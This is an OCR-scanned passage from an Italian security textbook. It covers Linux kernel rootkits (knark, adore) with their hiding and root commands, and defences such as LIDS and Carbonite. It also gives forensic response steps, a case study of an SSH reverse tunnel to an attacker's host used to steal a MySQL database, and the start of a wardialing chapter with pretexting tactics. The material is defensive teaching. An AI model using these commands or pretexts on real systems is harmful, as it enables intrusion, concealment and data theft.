lare un kernel compatto e di piccole dimensioni e caricare i diversi moduli solo 
quando strettamente necessario. Molte distribuzioni UNIX supportano questa fun- 
zionalità, comprese Linux, FreeBSD e Solaris. Un hacker esperto potrebbe però 
abusare impunemente di questa funzionalità per manipolare completamente il siste- 
ma e tutti i processi. Per esempio, invece che per caricare i driver delle schede di re- 
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te, potrebbe utilizzare LKM per intercettare le chiamate di sistema e modificare la ri- 
sposta del sistema a determinati comandi. I due rootkit di kernel più diffusi sono 
knark per Linux e Solaris Loadable Kernel Modules (http://packetstormsecuri - 
ty.org/groups/thc/slkm-1.0.html) di THC. In seguito prenderemo in considera- 
zione knark (http://packetstormsecurity.org/UNIX/penetration/rootkits/ 
knark-0.59.tar.gz). 

knark è stato sviluppato da Creed ed è un rootkit basato sulle versioni 2.2.x del ker- 
nel Linux. Il cuore del pacchetto software è il modulo kernel knark.o. Per caricare 
il modulo è possibile utilizzare il programma di utilità insmod: 


[shadow]# /sbin/insmod knark.o 
Verifichiamo che il modulo sia stato caricato: 


[shadow]# /sbin/1lsmod 


Module Size Used by 

knark 6936 @ (unused) 
nls_is08859-1 2240 1 (autoclean) 

lockd 30344 1 (autoclean) 

sunrpc 52132 1 (autoclean) [lockd] 
rt18139 11748 1 (autoclean) 


Come si può vedere, il modulo kernel knark è stato caricato, e sarebbe semplice 
per un amministratore di sistema individuare questo modulo, spegnendo sul nasce- 
re il desiderio dell’hacker di rimanere nascosto nel sistema con in possesso le auto- 
rizzazioni di accesso privilegiato. Per questo motivo l'hacker utilizza il modulo LKM 
modhide.o (che fa parte del pacchetto knark) per rimuovere il modulo knark 
dall'uscita prodotta da 1smod: 


[shadow]# /sbin/insmod modhide.o 
modhide.o: init _module: Device or resource busy 
[shadow]# /sbin/lsmod 


Module Size Used by 

nls_is08859-1 2240 1 (autoclean) 

lockd 30344 1 (autoclean) 

sunrpc 52132 1 (autoclean) [lockd] 
rt18139 11748 1 (autoclean) 


Come si può vedere, eseguendo nuovamente il comando 1lsmod, knark è magica- 
mente scomparso. Altri programmi di utilità interessanti inclusi nel pacchetto knark 
sono i seguenti: 


e hidef. Utilizzato per nascondere i file del sistema; 

e unhidef. Utilizzato per mostrare i file nascosti; 

e ered. Utilizzato per configurare il reindirizzamento degli eseguibili, consen- 
tendo l'esecuzione dei programmi trasformati in trojan dall’hacker invece 
delle loro versioni originali; 

e nethide. Utilizzato per nascondere le stringhe in /proc/net/tcp e 
/proc/net/udp, che sono i file da cui netstat ricava le sue informazioni e 
viene utilizzata dagli hacker per nascondere le connessioni da e verso il si- 
stema manomesso; 

e taskhack. Utilizzato per modificare le impostazioni *UID e *GID dei pro- 
cessi in esecuzione, che consente a un hacker di modificare istantaneamen- 
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te il proprietario del processo /bin/sh (eseguito come un utente normale) 
nell’ID dell’utente root (0); 


e rexec. Utilizzato per eseguire comandi remoti su un server knark. Supporta 
la funzionalità di modifica dell’indirizzo di partenza, consentendo all’hacker 
di eseguire i comandi senza essere rilevato: 


e rootme. Utilizzato per ottenere l’accesso come root senza utilizzare pro- 
grammi SUID. L'esempio seguente evidenzia la semplicità di utilizzo: 


{[shadow]$ rootme /bin/sh 

rootme.c by Creed @ #hack.se 1999 creed@sekure.net 
Do you feel lucky today, hax@r? 
bash# 


Oltre a knark, Teso ha creato una versione aggiornata del rootkit del kernel deno- 
minata adore, disponibile all'indirizzo http://teso.scene.at/releases/adore- 
0.14.tar.gz. Questo programma è altrettanto se non più potente di knark. Di se- 
guito vengono riportate alcune delle opzioni disponibili: 


[shadow]$ ava 

Usage: ./ava {h,u,r,i,v,U} [file, PID or dummy (for 'U')] 
hide file 

unhide file 

execute as root 

uninstall adore 

make PID invisible 

make PID visible 


<eC3 Tx 


Se questo non basta a spaventarvi, Silvio Cesare ha scritto un saggio sugli strumenti 
che consentono di aggiornare al volo la memoria del kernel nei sistemi che non di- 
spongono del supporto LKM. 

Il saggio e gli strumenti associati sono disponibili all'indirizzo http://packetstor- 
msecurity.n1/9901-exploits/runtime-kernel-kmem-patching.txt. Per finire, 
Job De Haas ha svolto un lavoro di ricerca sull’hacking del kernel delle piattaforme 
Solaris. Potete dare un'occhiata al codice beta da lui scritto all'indirizzo http:// 
www.itsx.com/projects-lkm-kmod.html. 


Contromisure al rootkit del kernel 


Abbiamo visto che i rootkit del kernel possono avere un effetto devastante e sono 
quasi impossibili da scoprire. Quando tentate di stabilire se un sistema è stato ma- 
nomesso non potete fare affidamento ai file eseguibili o al kernel stesso. Persino i 
programmi di utilità per il calcolo del checksum come Tripwire sono inutilizzabili, 
una volta che il kernel è stato manomesso. Un metodo per individuare knark è uti- 
lizzare knark stesso. Poiché knark consente a un intruso di nascondere un qualsiasi 
processo invocando il comando kill -31 su uno specifico PID, è possibile mostra- 
re un processo inviando al processo stesso il comando kill -32. È sufficiente scri- 
vere un semplice script di shell che invia a ciascun PID il comando kill -32: 


#!/bin/sh 
rm pid 
S=1 
while [ $S -lt 10000 ] 
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do 
if kill -32 $S; then 
echo "$S" >> pid 
fi 
S='expr $S + 1° 


Done 


Ricordate che, una volta caricato knark, kill -31 e kill -32 sono opzioni configu- 
rabili. Di conseguenza un hacker più abile può modificare queste opzioni per evitare 
di essere individuato. Tuttavia, la maggior parte degli hacker inesperti tenderà a uti- 
lizzare le impostazioni predefinite. Meglio ancora, potete utilizzare un programma di 
utilità chiamato Carbonite, scritto da Kevin Mandia e Keith Jones di Foundstone (re- 
peribile all'indirizzo http://ww.foundstone.com/knowledge/free_tools.html). 
Carbonite è un modulo di kernel Linux che “congela” lo stato di qualsiasi processo 
presente nella task_struct, che è la struttura del kernel che contiene le informazioni 
su qualsiasi processo in esecuzione, aiutando a individuare LKM pericolosi. Carboni- 
te cattura informazioni simili a quelle di 1sof, ps e una copia dell'immagine esegui- 
bile di ogni processo avviato sul sistema. La possibilità di “interrogare” un processo è 
utile anche in caso un intruso nasconda un processo con uno strumento come 
knark, dal momento che Carbonite lavora all’interno del contesto del kernel 
dell'host vittima. 

La prevenzione è sempre la migliore contromisura consigliabile. L'utilizzo di un 
programma come LIDS (Lina Intrusion Detection System) è la migliore contromi- 
sura adottabile nei sistemi Linux. LIDS è disponibile all'indirizzo ww. lids.org ed è 
in grado di fornire, tra le altre, le seguenti funzionalità. 

Possibilità di “sigillare” il kernel per impedire le modifiche. 

Possibilità di impedire il caricamento e lo scaricamento dei moduli kernel. 
Autorizzazioni di accesso a file (solo accodamento) invariabili. 

Blocco dei segmenti di memoria condivisi. 

Protezione contro la manipolazione del PID. 


Protezione dei file /dev/ particolarmente importanti. 


Intercettazione delle scansioni sulle porte. 


LIDS è un aggiornamento del kernel che deve essere applicato al sorgente del ker- 
nel esistente e che richiede la ricompilazione del kernel stesso. Una volta installato 
LIDS, utilizzate lo strumento lidsadm per “sigillare” il kernel, in modo da prevenire 
molti dei tiri mancini agli LEM precedentemente menzionati. Esaminiamo cosa ac- 
cade quando LIDS è attivo e l'hacker cerca di eseguire knark: 


[shadow]# insmod knark.o 
Command terminated on signal 1. 


Un'occhiata al file /var/log/messages indica che non solo LIDS ha intercettato il 
tentativo di caricamento del modulo ma che lo ha anche impedito: 


Jul 9 13:32:02 shadow kernel: LIDS: insmod (3 1 inode 58956) pid 700 
user (0/0) on pts@: CAP_SYS MODULE violation: try to create module knark 


Per i sistemi non Linux che richiedono livelli di sicurezza particolarmente elevati, 
potrebbe essere opportuno esaminare cosa succede quando viene disabilitato il 
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supporto LKM. Pur non essendo la soluzione più elegante, questo approccio evita 
che qualche ragazzino impertinente vi rovini la giornata. 

Oltre a LIDS, è stato sviluppato un pacchetto relativamente nuovo per bloccare i 
rootkit. St. Michael (http: //ww.surceforge.net/project/stjude) è un supporto 
LKM che cerca di rilevare i tentativi di installazione di una backdoor di modulo ker- 
nel in un sistema Linux attivo. Questa tecnica è ottenuta grazie al monitoraggio nel- 
la tabella delle chiamate di sistema delle modifiche ai processi init_module e 
delete module. 


Ripristino del rootkit 


Non è certo possibile fornire un elenco completo di tutti gli strumenti di sicurezza 
che dovrebbero far parte del vostro arsenale: per questo vi consigliamo il lavoro 
completo di Chris Prosise e Kevin Mandia Hacker Pronto Intervento, Apogeo, 2002. 
Tuttavia è importante essere pronti a sfoderare le proprie armi dovesse mai arrivare 
la fatidica chiamata. Sì, ma quale chiamata? Lo scenario è più o meno il seguente. 
“Salve, sono l'amministratore di sistema della società pinco pallino. Ho ragione di 
credere che sia in corso un attacco da parte del vostro sistema”. “Non è possibile, 
qui sembra tutto normale”, risponderete. Il vostro interlocutore vi chiederà di ese- 
guire un controllo e di richiamarlo più tardi. Adesso provate quella stretta di stoma- 
co che solo l'amministratore di un sistema violato può comprendere. Dovete deter- 
minare cosa è successo e come sia potuto succedere. Restate calmi e siate consape- 
voli del fatto che qualsiasi azione intrapresa sul sistema potrebbe cancellare la pro- 
va elettronica dell'avvenuta intrusione: basta visualizzare un file per modificare la 
data e l’ora dell’ultimo accesso. Il primo passo importante per preservare le even- 
tuali prove consiste nel creare una raccolta di file binari collegati staticamente, di 
cui sia stata verificata la cifratura. L'utilizzo di questi file è necessario nel caso in cui 
l'hacker modifichi i file di una libreria condivisa del sistema manomesso. Questa 
operazione deve essere eseguita prima che si verifichi l'incidente. Create e mante- 
nete un dischetto o un CD-ROM contenente la raccolta dei programmi collegati sta- 
ticamente più diffusi. Tra questi non devono mancare i programmi elencati nella ta- 
bella seguente. 


ls su dd 
ps login du 
netstat grep lsof 
Ww df top 
finger sh file 


Avendo a disposizione questa cassetta degli attrezzi, è importante preservare i tre 
valori di data e ora associati a ciascun file di un sistema UNIX. Questi includono Ja 
data e l'ora dell'ultimo accesso, la data e l'ora della modifica e la data e l’ora di crea- 
zione. Un metodo semplice per salvare queste informazioni consiste nell'eseguire i 
comandi riportati di seguito e salvare il risultato su un dischetto o un supporto 
esterno: 


ls -alRu > /floppy/timestamp_access.txt 
ls -alRc > /floppy/timestamp_modification.txt 
1s -alR > /floppy/timestamp_creation.txt 
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Come minimo, potete iniziare a esaminare l'output offline senza disturbare ulterior- 
mente il sistema sotto indagine. Nella maggior parte dei casi, avrete a che fare con un 
rootkit “pronto all'uso” installato con una configurazione predefinita. In base alla 
data di installazione del rootkit, dovreste essere in grado di vedere molti dei file root- 
kit, dei log degli sniffer, e così via. Questo se il rootkit con cui avete a che fare non ha 
modificato il kernel; in caso contrario, i risultati restituiti dai comandi citati in prece- 
denza non sono affidabili. Quando eseguite il vostro lavoro da “medico legale” sui si- 
stemi Linux, prendete in considerazione la possibilità di utilizzare un supporto di av- 
vio sicuro come Trinux (http://ww.trinux.org). Questo dovrebbe fomirvi infor- 
mazioni sufficienti per determinare se sul vostro sistema è stato installato un rootkit. 
Una volta che avete a disposizione queste informazioni, consultate le seguenti risorse 
per determinare che cosa è stato modificato e come è stato possibile manomettere il 
sistema. È importante prendere nota dei comandi eseguiti e dell'output risultante: 


e http://staff.washington.edu/dittrich/misc/fags/rootkits.faq 
e http://staff.washington.edu/dittrich/misc/fags/responding.faq 


e http://home.datacomm.ch/prutishauser/textz/backdoors/rootkits- 
desc.txt 
e http://ww.fish.com/forensics/freezing.pdf e il corrispondente tool- 
kit Forensic (http://ww.fish.com/security/tct.html) 
Assicuratevi anche di predisporre un buon piano di risposta agli attacchi prima che 
questi si verifichino (http://ww.sei.cmu.edu/pub/documents/98.reports/pdf/ 
98hb001 .pdf). Non fate come molte persone che, appena individuata una falla nella 
sicurezza, chiamano subito la polizia. Ci sono molti altri passaggi nel mezzo. 


Tabella 7,3 Risorse per la sicurezza di UNIX 


Nome Sistema Reperibilità Descrizione 
operativo 

Titan Solaris http://ww.fish.com/ Una collezione di pro- 
titan/ grammi per Solaris. 

“Solaris Security FAQ” Solaris http://ww.itworld.com/ Una guida per la sicu- 
Comp/2377/security-fag/ rezza di Solaris. 

“Solaris Security Solaris http://ww.sin.com/ Una vasta gamma di 

Download” software/security programmi per la sicu- 
/downloads.html rezza in Sun. 

“Armoring Solaris” Solaris http://ww.spitzner Come “armare” Solaris. 
.net/armoring2.html Questo articolo presen- 


ta un metodo sistemati- 
co per preparare l’instal- 
lazione di firewall. In- 
clude anche uno script 
che aiuta nella prepara- 
zione del sistema. 
“FreeBSD Security FreeBSD http://ww.freebsd. Anche se questo manua- 
How-To” org/-jkb/howto.html le è specifico per Free- 
BSD, molto di quanto 
esposto può essere uti- 
lizzato con altre versio- 
ni di UNIX (specialmen- 
te OpenBSD e NetBSD), 


(Segue) 
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Tabella 7.3 


Capitolo 7 


(Continua) Risorse per la sicurezza di UNIX 


Nome 


“Linux Administrator’s 
Security Guide 
(LASG)” di Kurt 
Seifried 

“Watching Your Logs” 
di Lance Spitzner 


“UNIX Computer 
Security Checklist 
(Version 1.1)” 


“The Unix Secure 
Programming FAQ 
di Peter Galvin 


“CERT Intruder 
Detection Checklist” 


Stephanie 


Sistema 


operativo 


Linux 


Generico 


Generico 


Generico 


Generico 


OpenBSD 


Reperibilità 


https://ww.seifried. 
org/lasg/ 


http://ww.spitzner. 
net/swatch.html 


ftp://ftp.auscert.org. 
au/pub/auscert/papers/ 
unix _security_ 
checklist _1.1 


http://online.vsi.ru/ 
library/Programmer/ 
UNIX_SEC_FAQ/ 
secprog.html 


ftp://ww.cer0t.org/ 
tech_tips/intruder 
detection_checklist. 
html 


http://ww.innu,org 
/-brian/Stephanie 


Descrizione 


Uno dei migliori docu- 
menti sulla sicurezza 
dei sistemi Linux. 


Come pianificare e im- 
plementare un filtro au- 
tomatico per i file di 
log con swatch. Inclu- 
de esempi di configura- 
zione e implementazio- 
ne. 


Una pratica checklist per 
verificare la sicurezza di 
UNIX. 


Informazioni sulla pro- 
gettazione, sullo svilup- 
po e sul test di applica- 
zioni sicure. 

Una guida per stabilire 
se un sistema è stato 
manomesso. 


Una serie di aggiorna- 
menti volti ad aumen- 
tare la sicurezza. 
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Caso di studio: attraversamento 
dei firewall mediante tunneling 


Michael, amministratore di rete di SocietàXX, desiderava accertarsi che la sua rete 
fosse ben protetta. Egli tentò di effettuare dall'esterno diverse scansioni delle porte 
della rete e si ritenne soddisfatto dei risultati. Per fortuna, la sua azienda doveva 
unicamente assicurare il servizio Web al mondo esterno e i risultati della scansione 
delle porte effettuata da Michael confermavano che solo la porta 80 era aperta. Per- 
tanto Michael, soddisfatto del risultato dei suoi sforzi, se ne tornò a casa, persuaso 
che le regole del firewall erano state definite nel modo più restrittivo possibile. I fat- 
ti avrebbero dimostrato che aveva torto. 

Kevin, un cliente insoddisfatto dell'azienda di Michael, decise di vendicarsi renden- 
do pubblici i dati del database dei clienti della società. Navigando nel sito Web di 
SocietàXX, Kevin si accorse che il webmaster aveva lasciato inavvertitamente alcuni 
commenti sul sorgente HTML del sito Web. Tra l’altro, questi commenti conteneva- 
no il nome utente e la password utilizzate negli script CGI per la connessione al ser- 
ver del database MySQL. Immediatamente, Kevin tentò di connettersi al database 
del server MySQL sulla porta 3306, ma non vi riuscì a causa del firewall di Socie- 
tàXX che bloccava le connessioni in entrata su qualsiasi porta eccetto la 80. Dopo 
aver cercato per alcune ore, Kevin fu in grado di sfruttare uno script CGI mal pro- 
gettato del sito Web di SocietàXX per eseguire comandi arbitrari sul server Web. 
Tuttavia fu in grado eseguirli unicamente con i privilegi dell'utente “nobody” e non 
riuscì a provocare danni eccessivi. 

L'obiettivo principale di Kevin era connettersi al database di SocietàXX e imposses- 
sarsi dei dati riguardanti i clienti. Come avrebbe potuto connettersi al database My- 
SQL se il firewall non glielo consentiva? Questa domanda ottenne presto una rispo- 
sta, allorché Kevin si rammentò della capacità dell'SSH di effettuare l'inoltro remoto 
delle porte. Dopo aver creato un utente temporaneo sulla sua postazione Linux, Ke- 
vin eseguì l’utility ssh_keygen di SSH per creare un file delle chiavi privato senza 
pass-phrase e lo rinominò id_rsa. Egli caricò questo file sul server Web di Socie- 
tàXX, sfruttando lo script CGI vulnerabile che aveva scoperto in precedenza per 
eseguire una richiesta tftp get verso il suo server tftp. A questo punto, Kevin ese- 
guì sul server Web di SocietàXX il comando seguente: 


ssh -R 3306:127.0.0.1:3306 temporaryuser@kevinslinuxbox.com -I id rsa -N 


Grazie a questo comando, il server Web di SocietàXX iniziò una sessione SSH verso 
il server SSH situato nella postazione Linux di Kevin senza che occorresse una ses- 
sione interattiva, poiché Kevin aveva già fornito il file delle chiavi private id_rsa da 
utilizzare per l'autenticazione. L'opzione -R 3306:127.0.1:3306 fece in modo che 
la porta locale 3306 del server Web di SocietàXX fosse inoltrata in remoto alla mac- 
china di Kevin tramite il tunneling SSH. A questo punto, a Kevin bastava connettersi 
alla porta 3306 sulla sua macchina locale utilizzando un client MySQL: in questo 
modo avrebbe potuto collegarsi alla porta 3306 del server Web di SocietàXX. 

Sfortunatamente, questo tipo di attacco è del tutto possibile nel mondo reale. Molti 
amministratori non configurano le regole del firewall in modo da bloccare connes- 
sioni dirette all’esterno non necessarie. In questo caso, gli host su cui veniva esegui- 
to il server Web di SocietàXX non avevano alcuna necessità di iniziare connessioni 
dirette all’esterno, ma non erano state previste regole del firewall tali da escludere 
questa possibilità. Utilizzando il metodo di tunneling appena descritto, un aggresso- 
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re ha la possibilità di connettersi a qualsiasi porta di una macchina vulnerabile. Me- 
diante l'utilizzo di tool di reindirizzamento delle porte quali fpipe di Foundstone, è 
inoltre possibile utilizzare la tecnica di tunneling SSH per inoltrare in remoto porte 
di altre macchine situate al di là del firewall! Ovviamente, questo è possibile solo se 
sono consentite connessioni dirette all’esterno dagli host vulnerabili. Per conclude- 
re, speriamo che questo caso di studio induca a riflettere sulle regole del firewall e 
a renderle più rigide. 


Capitolo 8 
Hacking telefonico 


Pochi elementi di una rete sono così trascurati come le linee POTS (Pain Old Tele- 
pbone System), che sono le linee telefoniche comuni. Sebbene siamo ormai arrivati 
alla quarta edizione di questo volume, siamo ancora costretti a prendere atto del fat- 
to che molte aziende utilizzano connessioni di accesso remoto, all’interno delle loro 
reti private o delle loro infrastrutture. In questo capitolo mostreremo come anche 
un vecchio modem a 9600 baud può bastare per mettere in ginocchio i Golia della 
sicurezza dei sistemi e delle reti. 

Aprire il capitolo dedicato all'hacking delle reti parlando di linee telefoniche analo- 
giche potrà sembrare anacronistico. L'arrivo nelle case delle connessioni a banda 
larga, mediante i cable modem e la DSL, sta soppiantando le connessioni di accesso 
remoto, ma il processo è ancora in atto: la rete telefonica commutata pubblica PSTN 
(Public Switched Telephone Network) è ancora oggi il mezzo più diffuso per colle- 
garsi da parte della maggior parte delle aziende e delle abitazioni. Allo stesso modo, 
i racconti sensazionali sulle violazioni dei siti Internet fanno passare in secondo pia- 
no le più consuete intrusioni via telefono, che sono potenzialmente più pericolose 
e semplici da portare a termine, 

In effetti, siamo pronti a scommettere che la maggior parte delle grandi aziende è 
molto più facilmente attaccabile attraverso linee modem trascurate o non corretta- 
mente censite, piuttosto che attraverso gateway Internet presidiati da firewall. Una 
volta il celebre guru di AT&T in materia di sicurezza, Bill Cheswick, ha paragonato 
una rete protetta da un firewall a “un guscio croccante con un frutto soffice e appe- 
titoso”. Questa frase ha colto esattamente nel segno: perché accanirsi contro un 
oscuro firewall quando ci si può tuffare direttamente nel tenero frutto approfittando 
di un server di accesso remoto poco protetto? La protezione dei collegamenti via te- 
lefono potrebbe essere il passo decisivo per arrivare ad avere un perimetro real- 
mente sicuro. L'approccio all'hacking delle connessioni telefoniche è sempre lo 
stesso: footprint, scansione, enumerazione, attacco. Con poche eccezioni, l’intero 
processo può essere automatizzato utilizzando strumenti tradizionali chiamati war- 
dialer o demon dialer. Fondamentalmente, si tratta di strumenti che compongono 
da programma una serie di numeri telefonici, registrando quelli corrispondenti a li- 
nee dati (carrier), cercando di identificare il sistema all’altro capo della linea telefo- 
nica, ed eventualmente tentando di effettuare una connessione utilizzando nomi 
utente e password di uso comune. Spesso vengono utilizzate anche connessioni 
manuali a numeri selezionati, in particolare se sono necessari software particolari 0 
la conoscenza del sistema che risponde. 
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Per questo la scelta del programma di wardialing è particolarmente delicata, vanto 
per i “buoni” quanto per i cattivi, se si vogliono identificare sulle linee telefoniche 
non protette. In questo capitolo descriveremo i due programmi di wardialing più 
popolari tra quelli disponibili gratuitamente su Internet (ToneLoc e THC-Scan), e 
due prodotti commerciali: PhoneSweep della Sandstorm Enterprises e TeleSweep 
Secure della Secure Logix. 

In seguito passeremo alla discussione di tecniche di attacco manuali e automatiche, 
applicabili agli obiettivi identificati dal sistema di wardialing; tra questi troviamo 
centralini remoti e sistemi di casella vocale. 


Preparazione alla connessione 


L’hacking telefonico richiede per prima cosa che sia identificata una serie di numeri 
da dare in pasto ai wardialer, Gli hacker generalmente iniziano con il nome di 
un'azienda e con una serie di numeri potenziali che derivano dalle fonti più dispa- 
rate. In seguito, illustreremo alcuni dei meccanismi per rilevare la struttura di una 
connessione di accesso remoto aziendale. 


® Footprinting dei numeri telefonici 


Diffusione: 9 
Semplicità: 8 
Impatto: 2 
Fattore di rischio: 6 


Il punto di partenza più scontato è l'elenco telefonico. Diverse società ormai vendo- 
no edizioni elettroniche dell’elenco telefonico su CD-ROM, dalle quali è possibile 
alimentare gli script per wardialer. Una volta identificato il numero di telefono ge- 
nerale, l'hacker solitamente estenderà il wardialing a tutti i numeri diretti. Per esem- 
pio, se il numero principale della Acme Corp. è 555-555-1212, la sessione di wardia- 
ling verrà estesa a tutti i 10.000 numeri 555-555-XXXX. Utilizzando quattro modem, 
la maggior parte dei software per wardialing è in grado di completare l’analisi di 
questo intervallo nel giro di qualche giorno, quindi anche reti molto grandi non 
sono un problema. 

Un'altra tattica possibile è chiamare la compagnia telefonica e tentare di circuire 
l’ignaro operatore del servizio clienti per ottenere informazioni sulla posizione della 
società. In questo modo è possibile venire a conoscenza di linee per accesso remo- 
to riservate o di linee esclusivamente destinate allo scambio di dati, che normal- 
mente utilizzano un prefisso diverso. Dietro richiesta dell’intestatario del contratto, 
molte compagnie telefoniche rilasciano simili informazioni per telefono solo se ci si 
identifica con una password, ma su questo punto esiste un certo grado di elasticità. 
A parte l’elenco telefonico, i siti Web aziendali sono un ottimo terreno di caccia per 
i numeri di telefono. Prese dall’euforia del libero scambio di informazioni sul Web, 
molte aziende arrivano a pubblicare su Internet l’intera rubrica telefonica interna. 
Difficilmente questo si rivela una buona idea, a meno che non trovi giustificazione 
in ottime ragioni commerciali. 

Su Internet esistono luoghi molto meno prevedibili in cui trovare numeri di telefo- 
no. Abbiamo già presentato uno dei più dannosi nel Capitolo 1, ma è il caso di ri- 
cordarlo in questa sede. Il database di registrazione dei nomi Internet (disponibile 
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all'indirizzo ww. arin.net) elargisce, attraverso l'interfaccia whois, informazioni sui 
principali contatti amministrativi tecnici e contabili all’interno di un’azienda legati 
alla sua presenza su Internet. Il seguente esempio (opportunamente epurato) di ri- 
cerca con whois di informazioni su acme. com dimostra i pro e i contro della pubbli- 
cazione di informazioni con la InterNIC: 


Registrant: Acme, Incorporated (ACME-DOM) 
Princeton Rd. Hightstown, NJ 08520 
US Domain Name: ACME.COM 
Administrative Contact: Smith, John (J4S0000) jsmith@ACME .COM 
555-555-5555 (FAX) 555-555-5556 
Technical Contact, Zone Contact: ANS Hostmaster (AH-ORG) 
hostmaster@ANS.NET 
(800)555-5555 


Questo non solo fornisce agli aggressori un riferimento telefonico valido da cui par- 
tire, ma anche il nome di un ottimo candidato John Smith) come copertura presso 
l'help desk aziendale o la compagnia telefonica per ottenere ulteriori informazioni. 
La seconda parte delle informazioni sul riferimento tecnico di zona è invece un 
esempio di come bisognerebbe definire le informazioni che vanno alla InterNIC: 
una descrizione generica della funzione (invece del nome) e un numero verde. In 
questo caso non si offrono appigli. 

Infine, comporre manualmente un numero ogni 25 per verificare se qualcuno ri- 
sponde “Società XYZ, posso aiutarla?” può essere noioso, ma è un metodo abba- 
stanza efficace per ricostruire un profilo degli accessi telefonici a un’azienda. Un'al- 
tra chicca sono i messaggi lasciati nella segreteria telefonica da dipendenti in ferie, 
cioè da persone che probabilmente per qualche tempo non saranno in grado di no- 
tare strani movimenti sul proprio account utente. Inoltre, i dipendenti non dovreb- 
bero mai dichiarare nei sistemi di messaggistica vocale la propria posizione nell’or- 
ganigramma aziendale: è un modo per facilitare l’identificazione di persone affida- 
bili, un'informazione che può essere utilizzata contro altri dipendenti. Per esempio: 
“Salve, lasciate un messaggio per Jim, vicedirettore del marketing” suggerisce una 
seconda chiamata all’help desk dei sistemi informativi: “Sono Jim, e sono un vicedi- 
rettore. Se non cambiate immediatamente la mia password ve ne pentirete!”, 


© Contromisura: bloccare le fughe di notizie 


La migliore difesa contro il footprinting telefonico è impedire la fuoriuscita non ne- 
cessaria di informazioni. Certo, se i numeri di telefono vengono pubblicati esiste un 
buon motivo, cioè permettere a clienti e partner in affari di contattarvi; ma è anche 
giusto porre dei limiti a questa sovraesposizione, Consultate la vostra compagnia te- 
lefonica per assicurarvi che vengano pubblicati solo i numeri necessari, definite un 
elenco di dipendenti autorizzati alla gestione dell'account, e pretendete che venga 
richiesta una password per qualsiasi accesso alle informazioni sul vostro account. 
Costituite all’interno dell’area IT un gruppo di controllo sulle fughe di informazioni 
che impedisca la pubblicazione di numeri telefonici “critici” su siti Web, elenchi, 
banner sui server di accesso remoto, e così via. Contattate la InterNIC e ripulite le 
informazioni sui contatti interni. Ma soprattutto, ricordate agli utenti che il telefono 
non è necessariamente un amico, e che è bene diffidare da chi richiede informazio- 
ni senza identificarsi, per quanto le richieste possano sembrare innocenti. 
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Wardialing 


Sostanzialmente il wardialing si riduce alla scelta degli strumenti da utilizzare. Di- 
scuteremo i meriti di ToneLoc, THC-Scan, PhoneSweep e TeleSweep, ma sono ne- 
cessarie alcune premesse. 


Hardware 


La scelta dell'hardware per il wardialing è altrettanto importante di quella del sof- 
tware, I due strumenti freeware di cui parleremo funzionano in ambiente DOS e 
hanno l’immotivata fama di essere difficili da configurare. Serve solamente disporre 
di un prompt DOS e di un modem. Tuttavia, qualsiasi programma di wardialing per 
PC richiede un minimo di conoscenze su come pilotare le porte COM per le confi- 
gurazioni più complesse, che comunque alcune volte non funzioneranno (un esem- 
pio per tutti, l’utilizzo di una scheda PCMCIA su un portatile). Non inventatevi con- 
figurazioni strane: un semplice PC con le due porte COM standard, ed eventual- 
mente una scheda seriale aggiuntiva per aggiungerne altre due, sono più che suffi- 
cienti. Dall'altra parte dello spettro, se pretendete la massima velocità da un sistema 
wardialing e non volete installare più modem, potete installare una scheda Digibo- 
ard multiporta che consente di collegare al sistema quattro o otto modem. 
L'hardware è anche il fattore principale che influisce su velocità ed efficienza del si- 
stema. Il software di wardialing dovrebbe essere configurato in modo da essere 
estremamente cauto e attendere un certo intervallo minimo di tempo, prima di pas- 
sare al numero successivo, in modo da evitare di mancare potenziali obiettivi a cau- 
sa di linee telefoniche rumorose o altro. Se si imposta come timeout standard un ri- 
tardo di 45-60 secondi, i wardialer in generale saranno in grado di effettuare una 
chiamata al minuto per ogni modem: è sufficiente fare due semplici conti per verifi- 
care se per esaurire un intervallo di 10.000 numeri bastano sette giorni, 24 ore su 24, 
con un solo modem. Ovviamente, l'utilizzo di modem dedicati alla causa riduce 
sensibilmente i tempi (quattro modem impiegheranno metà del tempo rispetto a 
due). Siccome l'hacker vede il wardialing come un gioco d’azzardo in un casinò di 
Las Vegas in cui il tavolo da gioco è disponibile 24 ore su 24, più modem vengono 
impiegati meglio è. Per effettuare test di penetrazione alla rete aziendale, più dispo- 
sitivi di wardialing vengono messi in funzione durante le ore di minore utilizzo, per 
esempio dalle 18 alle 6 di mattina e durante il fine settimana: se dovete effettuare 
una verifica di questo tipo considerate la possibilità di utilizzare più modem, per 
minimizzare i tempi. 

Anche la scelta dei modem può influenzare sensibilmente l'efficienza. Per esempio, 
i modem di qualità più elevata possono riconoscere risposte vocali, il che permette 
al software per wardialing di registrare immediatamente il numero di telefono come 
“voice”, riagganciare e continuare a comporre il numero successivo, senza attende- 
re il timeout specificato (45-60 secondi). Poiché una gran parte dei numeri telefonici 
in qualsiasi intervallo sarà relativa a linee vocali, la possibilità di eliminare il periodo 
di attesa riduce enormemente il tempo complessivo del wardialing. Se utilizzate 
tool di wardialing freeware, dovrete tenere conto del tempo necessario per ricono- 
scere i segnali di occupato e quelli di timeout. Il consiglio più immediato, anche se 
più ovvio, è quello di andarsi a leggere quali modem la documentazione dei tool 
definisce come più affidabili: tenetevi aggiornati, perché questa indicazione cambia 
nel tempo. 
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Aspetti legali 


Oltre a scegliere la piattaforma operativa, gli aspiranti wardialer dovrebbero tener 
presenti le implicazioni legali di questa attività. In certi stati è illegale comporre in 
sequenza grandi quantità di numeri telefonici e le compagnie telefoniche tendono a 
non vedere di buon occhio questa attività (sempre che le loro apparecchiature la 
consentano). Ovviamente, per evitare di richiamare l’attenzione, i programmi che 
presentiamo in questo capitolo cercano di comporre i numeri secondo una sequen- 
za casuale, ma questo non garantisce che riuscirete a farla franca. Diventa quindi 
estremamente importante, per chi intraprenda questa attività per scopi legittimi, ot- 
tenere un’autorizzazione scritta a svolgere tali test da parte dell'azienda oggetto del- 
le prove. Sarebbe opportuno concordare esplicitamente nel documento firmato gli 
intervalli di numeri telefonici da considerare, così che eventuali numeri estranei di- 
ventino responsabilità della società. 

L'accordo dovrebbe anche specificare il periodo del giorno in cui è consentita l’atti- 
vità di wardialing. Come abbiamo già detto, la composizione di interi blocchi di nu- 
meri appartenenti a una grande azienda durante le ore lavorative rischia di innervo- 
sire le persone e influenzare negativamente la produttività; quindi pianificate le atti- 
vità per la tarda nottata o intorno all’alba. 


Ricordate che eseguire il wardialing dei numeri di telefono dell'obiettivo su 
cui è attivo il servizio di identificazione del chiamante equivale a lasciare 
un biglietto da visita in ciascuno dei numeri composti. Più riagganci dalla 
stessa sorgente possono generare la collera della maggior parte dei sistemi 
